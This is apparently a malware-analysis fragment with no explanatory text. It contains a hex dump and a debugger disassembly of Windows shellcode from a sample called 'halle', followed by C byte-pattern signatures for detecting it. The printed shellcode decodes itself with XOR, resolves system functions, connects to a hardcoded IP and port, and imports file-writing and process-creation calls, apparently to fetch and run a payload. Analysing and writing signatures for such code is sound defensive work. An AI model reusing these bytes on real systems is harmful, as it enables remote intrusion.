8f 01 00 00 57 56 51 ........ .....WVQ 000007d0: 89 fe 89 c7 8b 8b a7 01 - 00 00 f3 a6 59 5e 5f 75 ........ ....Y..u 000007e0: bc 31 c0 8b 83 a3 01 00 - 00 d1 e0 8b 8b 9f 01 00 .1...... ........ 000007f0: 00 01 c1 31 c0 66 8b 01 - c1 e0 02 8b 8b 97 01 00 ...1.f.. ........ 00000800: 00 01 c8 8b 08 03 8b 8f - 01 00 00 89 c8 c3 31 c0 ........ ......1. 00000810: c3 e9 c8 02 00 00 3e 8b - 40 34 3e 8b a8 b8 00 00 ........ .4...... 00000820: 00 e9 0e 00 00 00 50 51 - 56 55 64 a1 30 00 00 00 ......PQ VUd.0... 00000830: 85 c0 78 e2 3e 8b 40 0c - 3e 8b 70 1c ad 3e 8b 68 ..x..... ..p....h 00000840: 08 89 ab 8f 01 00 00 89 - e8 66 81 38 4d 5a 75 c1 ........ .f.8MZu. 00000850: 05 3c 00 00 00 8b 08 03 - 8b 8f 01 00 00 66 81 39 ........ .....f.9 00000860: 50 45 75 ad 81 c1 78 00 - 00 00 8b 31 03 b3 8f 01 PEu...x. ...1.... 00000870: 00 00 81 c6 18 00 00 00 - ad 89 83 93 01 00 00 ad ........ ........ 00000880: 03 83 8f 01 00 00 89 83 - 97 01 00 00 ad 03 83 8f ........ ........ 00000890: 01 00 00 89 83 9b 01 00 - 00 ad 03 83 8f 01 00 00 ........ ........ 000008a0: 89 83 9f 01 00 00 5d 5e - 59 58 c3 50 b8 00 04 00 ........ YX.P.... 000008b0: 00 e8 71 01 00 00 3d 00 - 00 00 00 0f 84 ea ff ff ..q..... ........ 000008c0: ff 89 83 83 01 00 00 58 - 8b 93 83 01 00 00 52 68 .......X ......Rh 000008d0: 01 01 00 00 3e ff 53 41 - 3d 00 00 00 00 0f 85 e5 ......SA ........ 000008e0: ff ff ff 68 06 00 00 00 - 68 01 00 00 00 68 02 00 ...h.... h....h.. 000008f0: 00 00 3e ff 53 45 3d ff - ff ff ff 0f 84 e2 ff ff ....SE.. ........ 00000900: ff 89 83 f8 00 00 00 57 - 50 53 8d 93 7f 01 00 00 .......W PS...... 00000910: c6 02 16 52 8d 93 fc 00 - 00 00 66 c7 02 02 00 66 ...R.... ..f....f 00000920: 8b 7b 08 66 89 7a 02 8b - 7b 04 89 7a 04 52 8b 83 ...f.z.. ...z.R.. 00000930: f8 00 00 00 50 3e ff 53 - 49 3d 00 00 00 00 0f 8c ....P..S I....... 00000940: c6 ff ff ff 5b 58 5f 50 - b8 00 10 00 00 e8 d5 00 .....X.P ........ 00000950: 00 00 3d 00 00 00 00 0f - 84 ea ff ff ff 89 83 60 ........ ........ 00000960: 01 00 00 58 e8 39 00 00 - 00 e8 d8 00 00 00 e8 57 ...X.9.. .......W 00000970: 00 00 00 e8 1f 01 00 00 - c3 8b 83 f8 00 00 00 50 ........ .......P 00000980: 3e ff 53 55 8b 83 ab 01 - 00 00 40 89 83 ab 01 00 ..SU.... ........ 00000990: 00 3d 05 00 00 00 0f 84 - 05 00 00 00 e9 42 ff ff ........ .....B.. 000009a0: ff c3 68 00 00 00 00 68 - 04 00 00 00 8d 93 87 01 ..h....h ........ 000009b0: 00 00 52 8b 93 f8 00 00 - 00 52 3e ff 53 4d 3d 01 ..R..... .R..SM.. 000009c0: 00 00 00 0f 8c b0 ff ff - ff c3 57 56 8b bb 87 01 ........ ..WV.... 000009d0: 00 00 8b b3 8b 01 00 00 - 39 f7 5e 5f 0f 84 32 00 ........ 9.....2. 000009e0: 00 00 68 00 00 00 00 68 - 00 10 00 00 8b 93 60 01 ..h....h ........ 000009f0: 00 00 52 8b 93 f8 00 00 - 00 52 3e ff 53 4d 3d 01 ..R..... .R..SM.. 00000a00: 00 00 00 0f 8c 70 ff ff - ff 01 83 8b 01 00 00 e9 .....p.. ........ 00000a10: 50 00 00 00 e8 6e 00 00 - 00 50 8b 83 f8 00 00 00 P....n.. .P...... 00000a20: 50 3e ff 53 55 58 c3 89 - c7 50 3e ff 93 97 00 00 P..SUX.. .P...... 00000a30: 00 5f 50 57 68 00 00 00 - 00 50 3e ff 93 93 00 00 ..PWh... .P...... 00000a40: 00 5f 5f 5f 58 c3 8d 93 - 64 01 00 00 52 8d 93 6c ....X... d...R..l 00000a50: 01 00 00 52 3e ff 93 87 - 00 00 00 5f 5f 89 83 68 ...R.... .......h 00000a60: 01 00 00 c3 ff b3 68 01 - 00 00 50 68 01 00 00 00 ......h. ..Ph.... 00000a70: 8b 93 60 01 00 00 52 3e - ff 93 8f 00 00 00 5f 5f ......R. ........ 00000a80: 5f 5f e9 43 ff ff ff 8b - 93 68 01 00 00 52 3e ff ...C.... .h...R.. 00000a90: 93 8b 00 00 00 5f c3 50 - 8d 83 0c 01 00 00 50 8d .......P ......P. 00000aa0: 83 1c 01 00 00 50 68 00 - 00 00 00 68 00 00 00 00 .....Ph. ...h.... 00000ab0: 68 28 00 00 00 68 00 00 - 00 00 68 00 00 00 00 68 h....h.. ..h....h 00000ac0: 00 00 00 00 8d 83 6c 01 - 00 00 50 68 00 00 00 00 ......l. ..Ph.... 00000ad0: 3e ff 93 ec 00 00 00 58 - c3 e8 a9 ff ff ff 68 00 .......X ......h. 00000ae0: 00 00 00 ff 93 e8 00 00 - 00 90 00 00 5c 00 43 00 ........ ......C. 00000af0: 24 00 5c 00 31 00 32 00 - 33 00 34 00 35 00 36 00 ....1.2. 3.4.5.6. 00000b00: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 31 00 1.1.1.1. 1.1.1.1. 00000b10: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 2e 00 1.1.1.1. 1.1.1... 00000b20: 64 00 6f 00 63 00 00 00 - 01 10 08 00 cc cc cc cc d.o.c... ........ 00000b30: 20 00 00 00 30 00 2d 00 - 00 00 00 00 88 2a 0c 00 ....0... ........ 00000b40: 02 00 00 00 01 00 00 00 - 28 8c 0c 00 01 00 00 00 ........ ........ 00000b50: 07 00 00 00 00 00 00 00 - 00 ........ .
00424A46 90 NOP 00424A47 EB 02 JMP SHORT halle.00424A4B 00424A49 EB 05 JMP SHORT halle.00424A50 00424A4B E8 F9FFFFFF CALL halle.00424A49 00424A50 5B POP EBX 00424A51 31C9 XOR ECX,ECX 00424A53 66:B9 8606 MOV CX,686 ; xor len 00424A57 8073 0E D4 XOR BYTE PTR DS:[EBX+E],0D4 00424A5B 43 INC EBX 00424A5C ^E2 F9 LOOPD SHORT halle.00424A57 00424A5E E9 5F010000 JMP halle.00424BC2
00424BAD 8983 9B000000 MOV DWORD PTR DS:[EBX+9B],EAX 00424BB3 53 PUSH EBX 00424BB4 E8 EB020000 CALL halle.00424EA4 00424BB9 5B POP EBX 00424BBA 58 POP EAX 00424BBB 5F POP EDI 00424BBC 5E POP ESI 00424BBD E8 10050000 CALL halle.004250D2 00424BC2 E8 9CFEFFFF CALL halle.00424A63 00424BC7 0000 ADD BYTE PTR DS:[EAX],AL ; 46 E4 24 76 is ip && 2E 1D is port 00424BC9 0000 ADD BYTE PTR DS:[EAX],AL 00424BCB 46 INC ESI 00424BCC E4 24 IN AL,24 ; I/O command 00424BCE 76 2E JBE SHORT halle.00424BFE 00424BD0 1D 7773325F SBB EAX,5F327377 00424BD5 3332 XOR ESI,DWORD PTR DS:[EDX] 00424BD7 0057 53 ADD BYTE PTR DS:[EDI+53],DL 00424BDA 41 INC ECX 00424BDB 53 PUSH EBX 00424BDC 74 61 JE SHORT halle.00424C3F 00424BDE 72 74 JB SHORT halle.00424C54 00424BE0 75 70 JNZ SHORT halle.00424C52 00424BE2 0073 6F ADD BYTE PTR DS:[EBX+6F],DH 00424BE5 636B 65 ARPL WORD PTR DS:[EBX+65],BP 00424BE8 74 00 JE SHORT halle.00424BEA 00424BEA 636F 6E ARPL WORD PTR DS:[EDI+6E],BP 00424BED 6E OUTS DX,BYTE PTR ES:[EDI] ; I/O command 00424BEE 65:637400 72 ARPL WORD PTR GS:[EAX+EAX+72],SI 00424BF3 65:6376 00 ARPL WORD PTR GS:[ESI],SI 00424BF7 73 65 JNB SHORT halle.00424C5E 00424BF9 6E OUTS DX,BYTE PTR ES:[EDI] ; I/O command 00424BFA 64:0063 6C ADD BYTE PTR FS:[EBX+6C],AH 00424BFE 6F OUTS DX,DWORD PTR ES:[EDI] ; I/O command 00424BFF 73 65 JNB SHORT halle.00424C66 00424C01 73 6F JNB SHORT halle.00424C72 00424C03 636B 65 ARPL WORD PTR DS:[EBX+65],BP 00424C06 74 00 JE SHORT halle.00424C08 00424C08 F5 CMC 00424C09 D7 XLAT BYTE PTR DS:[EBX+AL] 00424C0A FA CLI 00424C0B 74 3D JE SHORT halle.00424C4A 00424C0D 35 FA74B9C1 XOR EAX,C1B974FA 00424C12 FA CLI 00424C13 74 01 JE SHORT halle.00424C16 00424C15 A1 FA74CC1B MOV EAX,DWORD PTR DS:[1BCC74FA] 00424C1A FA CLI 00424C1B 74 5E JE SHORT halle.00424C7B 00424C1D 14 FA ADC AL,0FA 00424C1F 74 6D JE SHORT halle.00424C8E 00424C21 73 76 JNB SHORT halle.00424C99 00424C23 6372 74 ARPL WORD PTR DS:[EDX+74],SI 00424C26 0066 6F ADD BYTE PTR DS:[ESI+6F],AH 00424C29 70 65 JO SHORT halle.00424C90 00424C2B 6E OUTS DX,BYTE PTR ES:[EDI] ; I/O command 00424C2C 0066 63 ADD BYTE PTR DS:[ESI+63],AH 00424C2F 6C INS BYTE PTR ES:[EDI],DX ; I/O command 00424C30 6F OUTS DX,DWORD PTR ES:[EDI] ; I/O command 00424C31 73 65 JNB SHORT halle.00424C98 00424C33 0066 77 ADD BYTE PTR DS:[ESI+77],AH 00424C36 72 69 JB SHORT halle.00424CA1 00424C38 74 65 JE SHORT halle.00424C9F 00424C3A 006D 65 ADD BYTE PTR SS:[EBP+65],CH 00424C3D 6D INS DWORD PTR ES:[EDI],DX ; I/O command 00424C3E 73 65 JNB SHORT halle.00424CA5 00424C40 74 00 JE SHORT halle.00424C42 00424C42 6D INS DWORD PTR ES:[EDI],DX ; I/O command 00424C43 61 POPAD 00424C44 6C INS BYTE PTR ES:[EDI],DX ; I/O command 00424C45 6C INS BYTE PTR ES:[EDI],DX ; I/O command 00424C46 6F OUTS DX,DWORD PTR ES:[EDI] ; I/O command 00424C47 6300 ARPL WORD PTR DS:[EAX],AX 00424C49 -66:72 65 JB SHORT 00004CB1 00424C4C 65:00AB 0F02789F ADD BYTE PTR GS:[EBX+9F78020F],CH 00424C53 FD STD 00424C54 0078 A6 ADD BYTE PTR DS:[EAX-5A],BH 00424C57 34 02 XOR AL,2 00424C59 78 1D JS SHORT halle.00424C78 00424C5B 1A00 SBB AL,BYTE PTR DS:[EAX] 00424C5D ^78 A9 JS SHORT halle.00424C08 00424C5F 14 00 ADC AL,0 00424C61 ^78 B0 JS SHORT halle.00424C13 00424C63 1D 00786B65 SBB EAX,656B7800 00424C68 72 6E JB SHORT halle.00424CD8 00424C6A 65:6C INS BYTE PTR ES:[EDI],DX ; I/O command 00424C6C 3332 XOR ESI,DWORD PTR DS:[EDX] 00424C6E 0047 65 ADD BYTE PTR DS:[EDI+65],AL 00424C71 74 50 JE SHORT halle.00424CC3 00424C73 72 6F JB SHORT halle.00424CE4 00424C75 6341 64 ARPL WORD PTR DS:[ECX+64],AX 00424C78 64:72 65 JB SHORT halle.00424CE0 ; Superfluous prefix 00424C7B 73 73 JNB SHORT halle.00424CF0 00424C7D 004C6F 61 ADD BYTE PTR DS:[EDI+EBP*2+61],CL 00424C81 64:4C DEC ESP ; Superfluous prefix 00424C83 6962 72 61727941 IMUL ESP,DWORD PTR DS:[EDX+72],41797261 00424C8A 0053 6C ADD BYTE PTR DS:[EBX+6C],DL 00424C8D 65: PREFIX GS: ; Superfluous prefix 00424C8E 65:70 00 JO SHORT halle.00424C91 ; Superfluous prefix 00424C91 45 INC EBP 00424C92 78 69 JS SHORT halle.00424CFD 00424C94 74 54 JE SHORT halle.00424CEA 00424C96 68 72656164 PUSH 64616572 00424C9B 0043 72 ADD BYTE PTR DS:[EBX+72],AL 00424C9E 65:61 POPAD ; Superfluous prefix 00424CA0 74 65 JE SHORT halle.00424D07 00424CA2 50 PUSH EAX 00424CA3 72 6F JB SHORT halle.00424D14 00424CA5 6365 73 ARPL WORD PTR SS:[EBP+73],SP 00424CA8 73 41 JNB SHORT halle.00424CEB 00424CAA 0003 ADD BYTE PTR DS:[EBX],AL 00424CAC A2 E9779DB9 MOV BYTE PTR DS:[B99D77E9],AL 00424CB1 -E9 77A84FE9 JMP E991F52D 00424CB6 ^77 D5 JA SHORT halle.00424C8D 00424CB8 01E9 ADD ECX,EBP 00424CBA 77 5F JA SHORT halle.00424D1B 00424CBC 0C E9 OR AL,0E9 00424CBE 77 60 JA SHORT halle.00424D20 00424CC0 0000 ADD BYTE PTR DS:[EAX],AL 00424CC2 0002 ADD BYTE PTR DS:[EDX],AL 00424CC4 002E ADD BYTE PTR DS:[ESI],CH 00424CC6 1D 46E42476 SBB EAX,7624E446 00424CCB 0000 ADD BYTE PTR DS:[EAX],AL 00424CCD 0000 ADD BYTE PTR DS:[EAX],AL 00424CCF 0000 ADD BYTE PTR DS:[EAX],AL 00424CD1 0000 ADD BYTE PTR DS:[EAX],AL 00424CD3 0000 ADD BYTE PTR DS:[EAX],AL 00424CD5 0000 ADD BYTE PTR DS:[EAX],AL 00424CD7 0000 ADD BYTE PTR DS:[EAX],AL 00424CD9 0000 ADD BYTE PTR DS:[EAX],AL 00424CDB 0000 ADD BYTE PTR DS:[EAX],AL 00424CDD 0000 ADD BYTE PTR DS:[EAX],AL 00424CDF 0000 ADD BYTE PTR DS:[EAX],AL 00424CE1 0000 ADD BYTE PTR DS:[EAX],AL 00424CE3 44 INC ESP 00424CE4 0000 ADD BYTE PTR DS:[EAX],AL 00424CE6 0000 ADD BYTE PTR DS:[EAX],AL 00424CE8 0000 ADD BYTE PTR DS:[EAX],AL 00424CEA 0000 ADD BYTE PTR DS:[EAX],AL 00424CEC 0000 ADD BYTE PTR DS:[EAX],AL 00424CEE 0000 ADD BYTE PTR DS:[EAX],AL 00424CF0 0000 ADD BYTE PTR DS:[EAX],AL 00424CF2 0000 ADD BYTE PTR DS:[EAX],AL 00424CF4 0000 ADD BYTE PTR DS:[EAX],AL 00424CF6 0000 ADD BYTE PTR DS:[EAX],AL 00424CF8 0000 ADD BYTE PTR DS:[EAX],AL 00424CFA 0000 ADD BYTE PTR DS:[EAX],AL 00424CFC 0000 ADD BYTE PTR DS:[EAX],AL 00424CFE 0000 ADD BYTE PTR DS:[EAX],AL 00424D00 0000 ADD BYTE PTR DS:[EAX],AL 00424D02 0000 ADD BYTE PTR DS:[EAX],AL 00424D04 0000 ADD BYTE PTR DS:[EAX],AL 00424D06 0000 ADD BYTE PTR DS:[EAX],AL 00424D08 0000 ADD BYTE PTR DS:[EAX],AL 00424D0A 0000 ADD BYTE PTR DS:[EAX],AL 00424D0C 0000 ADD BYTE PTR DS:[EAX],AL 00424D0E 0000 ADD BYTE PTR DS:[EAX],AL 00424D10 0000 ADD BYTE PTR DS:[EAX],AL 00424D12 0000 ADD BYTE PTR DS:[EAX],AL 00424D14 0000 ADD BYTE PTR DS:[EAX],AL 00424D16 0000 ADD BYTE PTR DS:[EAX],AL 00424D18 0000 ADD BYTE PTR DS:[EAX],AL 00424D1A 0000 ADD BYTE PTR DS:[EAX],AL 00424D1C 0000 ADD BYTE PTR DS:[EAX],AL 00424D1E 0000 ADD BYTE PTR DS:[EAX],AL 00424D20 0000 ADD BYTE PTR DS:[EAX],AL 00424D22 0000 ADD BYTE PTR DS:[EAX],AL 00424D24 0000 ADD BYTE PTR DS:[EAX],AL 00424D26 0000 ADD BYTE PTR DS:[EAX],AL 00424D28 0000 ADD BYTE PTR DS:[EAX],AL 00424D2A 0077 2B ADD BYTE PTR DS:[EDI+2B],DH 00424D2D 6200 BOUND EAX,QWORD PTR DS:[EAX] 00424D2F 0000 ADD BYTE PTR DS:[EAX],AL 00424D31 0000 ADD BYTE PTR DS:[EAX],AL 00424D33 77 69 JA SHORT halle.00424D9E 00424D35 6E OUTS DX,BYTE PTR ES:[EDI] ; I/O command 00424D36 68 6C707033 PUSH 3370706C 00424D3B 322E XOR CH,BYTE PTR DS:[ESI] 00424D3D 65:78 65 JS SHORT halle.00424DA5 ; Superfluous prefix 00424D40 006F 70 ADD BYTE PTR DS:[EDI+70],CH 00424D43 65:6E OUTS DX,BYTE PTR ES:[EDI] ; I/O command 00424D45 0016 ADD BYTE PTR DS:[ESI],DL 00424D47 0000 ADD BYTE PTR DS:[EAX],AL 00424D49 0068 24 ADD BYTE PTR DS:[EAX+24],CH 00424D4C 2F DAS 00424D4D 0000 ADD BYTE PTR DS:[EAX],AL 00424D4F 0000 ADD BYTE PTR DS:[EAX],AL 00424D51 0000 ADD BYTE PTR DS:[EAX],AL 00424D53 0000 ADD BYTE PTR DS:[EAX],AL 00424D55 0000 ADD BYTE PTR DS:[EAX],AL 00424D57 00E7 ADD BH,AH 00424D59 77 3D JA SHORT halle.00424D98 00424D5B 0300 ADD EAX,DWORD PTR DS:[EAX] 00424D5D 0048 42 ADD BYTE PTR DS:[EAX+42],CL 00424D60 EC IN AL,DX ; I/O command 00424D61 77 3C JA SHORT halle.00424D9F 00424D63 4F DEC EDI 00424D64 EC IN AL,DX ; I/O command 00424D65 77 30 JA SHORT halle.00424D97 00424D67 5C POP ESP 00424D68 EC IN AL,DX ; I/O command 00424D69 ^77 E5 JA SHORT halle.00424D50 00424D6B 0100 ADD DWORD PTR DS:[EAX],EAX 00424D6D 000D 00000000 ADD BYTE PTR DS:[0],CL 00424D73 0000 ADD BYTE PTR DS:[EAX],AL 00424D75 0051 57 ADD BYTE PTR DS:[ECX+57],DL 00424D78 56 PUSH ESI 00424D79 56 PUSH ESI 00424D7A FF93 F0000000 CALL DWORD PTR DS:[EBX+F0] 00424D80 50 PUSH EAX 00424D81 59 POP ECX 00424D82 57 PUSH EDI 00424D83 51 PUSH ECX 00424D84 FF93 F4000000 CALL DWORD PTR DS:[EBX+F4] 00424D8A 5E POP ESI 00424D8B 5F POP EDI 00424D8C 59 POP ECX 00424D8D C3 RETN 00424D8E 31C0 XOR EAX,EAX 00424D90 8983 A3010000 MOV DWORD PTR DS:[EBX+1A3],EAX 00424D96 8B93 A3010000 MOV EDX,DWORD PTR DS:[EBX+1A3] 00424D9C 3B93 93010000 CMP EDX,DWORD PTR DS:[EBX+193] 00424DA2 7D 63 JGE SHORT halle.00424E07 00424DA4 42 INC EDX 00424DA5 8993 A3010000 MOV DWORD PTR DS:[EBX+1A3],EDX 00424DAB 31C0 XOR EAX,EAX 00424DAD 8B83 A3010000 MOV EAX,DWORD PTR DS:[EBX+1A3] 00424DB3 C1E0 02 SHL EAX,2 00424DB6 8B8B 9B010000 MOV ECX,DWORD PTR DS:[EBX+19B] 00424DBC 01C1 ADD ECX,EAX 00424DBE 8B01 MOV EAX,DWORD PTR DS:[ECX] 00424DC0 0383 8F010000 ADD EAX,DWORD PTR DS:[EBX+18F] 00424DC6 57 PUSH EDI 00424DC7 56 PUSH ESI 00424DC8 51 PUSH ECX 00424DC9 89FE MOV ESI,EDI 00424DCB 89C7 MOV EDI,EAX 00424DCD 8B8B A7010000 MOV ECX,DWORD PTR DS:[EBX+1A7] 00424DD3 F3:A6 REPE CMPS BYTE PTR ES:[EDI],BYTE PTR DS:> 00424DD5 59 POP ECX 00424DD6 5E POP ESI 00424DD7 5F POP EDI 00424DD8 ^75 BC JNZ SHORT halle.00424D96 00424DDA 31C0 XOR EAX,EAX 00424DDC 8B83 A3010000 MOV EAX,DWORD PTR DS:[EBX+1A3] 00424DE2 D1E0 SHL EAX,1 00424DE4 8B8B 9F010000 MOV ECX,DWORD PTR DS:[EBX+19F] 00424DEA 01C1 ADD ECX,EAX 00424DEC 31C0 XOR EAX,EAX 00424DEE 66:8B01 MOV AX,WORD PTR DS:[ECX] 00424DF1 C1E0 02 SHL EAX,2 00424DF4 8B8B 97010000 MOV ECX,DWORD PTR DS:[EBX+197] 00424DFA 01C8 ADD EAX,ECX 00424DFC 8B08 MOV ECX,DWORD PTR DS:[EAX] 00424DFE 038B 8F010000 ADD ECX,DWORD PTR DS:[EBX+18F] 00424E04 89C8 MOV EAX,ECX 00424E06 C3 RETN 00424E07 31C0 XOR EAX,EAX 00424E09 C3 RETN 00424E0A E9 C8020000 JMP halle.004250D7 00424E0F 3E:8B40 34 MOV EAX,DWORD PTR DS:[EAX+34] 00424E13 3E:8BA8 B8000000 MOV EBP,DWORD PTR DS:[EAX+B8] 00424E1A E9 0E000000 JMP halle.00424E2D 00424E1F 50 PUSH EAX 00424E20 51 PUSH ECX 00424E21 56 PUSH ESI 00424E22 55 PUSH EBP 00424E23 64:A1 30000000 MOV EAX,DWORD PTR FS:[30] 00424E29 85C0 TEST EAX,EAX 00424E2B ^78 E2 JS SHORT halle.00424E0F 00424E2D 3E:8B40 0C MOV EAX,DWORD PTR DS:[EAX+C] 00424E31 3E:8B70 1C MOV ESI,DWORD PTR DS:[EAX+1C] 00424E35 AD LODS DWORD PTR DS:[ESI] 00424E36 3E:8B68 08 MOV EBP,DWORD PTR DS:[EAX+8] 00424E3A 89AB 8F010000 MOV DWORD PTR DS:[EBX+18F],EBP 00424E40 89E8 MOV EAX,EBP 00424E42 66:8138 4D5A CMP WORD PTR DS:[EAX],5A4D 00424E47 ^75 C1 JNZ SHORT halle.00424E0A 00424E49 05 3C000000 ADD EAX,3C 00424E4E 8B08 MOV ECX,DWORD PTR DS:[EAX] 00424E50 038B 8F010000 ADD ECX,DWORD PTR DS:[EBX+18F] 00424E56 66:8139 5045 CMP WORD PTR DS:[ECX],4550 00424E5B ^75 AD JNZ SHORT halle.00424E0A 00424E5D 81C1 78000000 ADD ECX,78 00424E63 8B31 MOV ESI,DWORD PTR DS:[ECX] 00424E65 03B3 8F010000 ADD ESI,DWORD PTR DS:[EBX+18F] 00424E6B 81C6 18000000 ADD ESI,18 00424E71 AD LODS DWORD PTR DS:[ESI] 00424E72 8983 93010000 MOV DWORD PTR DS:[EBX+193],EAX 00424E78 AD LODS DWORD PTR DS:[ESI] 00424E79 0383 8F010000 ADD EAX,DWORD PTR DS:[EBX+18F] 00424E7F 8983 97010000 MOV DWORD PTR DS:[EBX+197],EAX 00424E85 AD LODS DWORD PTR DS:[ESI] 00424E86 0383 8F010000 ADD EAX,DWORD PTR DS:[EBX+18F] 00424E8C 8983 9B010000 MOV DWORD PTR DS:[EBX+19B],EAX 00424E92 AD LODS DWORD PTR DS:[ESI] 00424E93 0383 8F010000 ADD EAX,DWORD PTR DS:[EBX+18F] 00424E99 8983 9F010000 MOV DWORD PTR DS:[EBX+19F],EAX 00424E9F 5D POP EBP 00424EA0 5E POP ESI 00424EA1 59 POP ECX 00424EA2 58 POP EAX 00424EA3 C3 RETN 00424EA4 50 PUSH EAX 00424EA5 B8 00040000 MOV EAX,400 00424EAA E8 71010000 CALL halle.00425020 00424EAF 3D 00000000 CMP EAX,0 00424EB4 ^0F84 EAFFFFFF JE halle.00424EA4 00424EBA 8983 83010000 MOV DWORD PTR DS:[EBX+183],EAX 00424EC0 58 POP EAX 00424EC1 8B93 83010000 MOV EDX,DWORD PTR DS:[EBX+183] 00424EC7 52 PUSH EDX 00424EC8 68 01010000 PUSH 101 00424ECD 3E:FF53 41 CALL DWORD PTR DS:[EBX+41] ; WSAStartup 00424ED1 3D 00000000 CMP EAX,0 ; after WSAStartup 00424ED6 ^0F85 E5FFFFFF JNZ halle.00424EC1 00424EDC 68 06000000 PUSH 6 00424EE1 68 01000000 PUSH 1 00424EE6 68 02000000 PUSH 2 00424EEB 3E:FF53 45 CALL DWORD PTR DS:[EBX+45] ; socket() 00424EEF 3D FFFFFFFF CMP EAX,-1 ; after socket 00424EF4 ^0F84 E2FFFFFF JE halle.00424EDC 00424EFA 8983 F8000000 MOV DWORD PTR DS:[EBX+F8],EAX 00424F00 57 PUSH EDI 00424F01 50 PUSH EAX 00424F02 53 PUSH EBX 00424F03 8D93 7F010000 LEA EDX,DWORD PTR DS:[EBX+17F] 00424F09 C602 16 MOV BYTE PTR DS:[EDX],16 00424F0C 52 PUSH EDX 00424F0D 8D93 FC000000 LEA EDX,DWORD PTR DS:[EBX+FC] 00424F13 66:C702 0200 MOV WORD PTR DS:[EDX],2 00424F18 66:8B7B 08 MOV DI,WORD PTR DS:[EBX+8] 00424F1C 66:897A 02 MOV WORD PTR DS:[EDX+2],DI 00424F20 8B7B 04 MOV EDI,DWORD PTR DS:[EBX+4] 00424F23 897A 04 MOV DWORD PTR DS:[EDX+4],EDI 00424F26 52 PUSH EDX ; check stack to verify ip & port here 00424F27 8B83 F8000000 MOV EAX,DWORD PTR DS:[EBX+F8] 00424F2D 50 PUSH EAX 00424F2E 3E:FF53 49 CALL DWORD PTR DS:[EBX+49] ; connect() 00424F32 3D 00000000 CMP EAX,0 ; after connect() 00424F37 ^0F8C C6FFFFFF JL halle.00424F03 00424F3D 5B POP EBX 00424F3E 58 POP EAX 00424F3F 5F POP EDI 00424F40 50 PUSH EAX 00424F41 B8 00100000 MOV EAX,1000 00424F46 E8 D5000000 CALL halle.00425020 00424F4B 3D 00000000 CMP EAX,0
const char *pattern = "\\x90\\xEB\\x02\\xEB\\x05\\xE8\\xF9\\xFF\\xFF\\xFF\\x5B\\x31\\xC9" "\\x66\\xB9(..)\\x80\\x73\\x0E(.)\\x43\\xE2\\xF9\\xE9\\x5F\\x01\\x00\\x00";
const char *pattern = "\\x89\\x83\\x9B\\x00\\x00\\x00\\x53\\xE8\\xEB\\x02\\x00\\x00\\x5B\\x58\\x5F\\x5E\\xE8\\x10\\x05\\x00\\x00\\xE8\\x9C\\xFE\\xFF\\xFF\\x00\\x00\\x00\\x00(.." "..)(..)\\x77\\x73\\x32\\x5F\\x33\\x32\\x00\\x57\\x53\\x41\\x53\\x74\\x61\\x72\\x74\\x75\\x70\\x00\\x73\\x6F\\x63\\x6B\\x65\\x74\\x00\\x63\\x6F\\x6E" "\\x6E\\x65\\x63\\x74\\x00\\x72\\x65\\x63\\x76\\x00\\x73\\x65\\x6E\\x64\\x00\\x63\\x6C\\x6F\\x73\\x65\\x73\\x6F\\x63\\x6B\\x65\\x74\\x00\\xF5\\xD7\\xFA\\x74\\x3D" "\\x35\\xFA\\x74\\xB9\\xC1\\xFA\\x74\\x01\\xA1\\xFA\\x74\\xCC\\x1B\\xFA\\x74\\x5E\\x14\\xFA\\x74\\x6D\\x73\\x76\\x63\\x72\\x74\\x00\\x66\\x6F\\x70\\x65\\x6E\\x00" "\\x66\\x63\\x6C\\x6F\\x73\\x65\\x00\\x66\\x77\\x72\\x69\\x74\\x65\\x00\\x6D\\x65\\x6D\\x73\\x65\\x74\\x00\\x6D\\x61\\x6C\\x6C\\x6F\\x63\\x00\\x66\\x72\\x65\\x65";
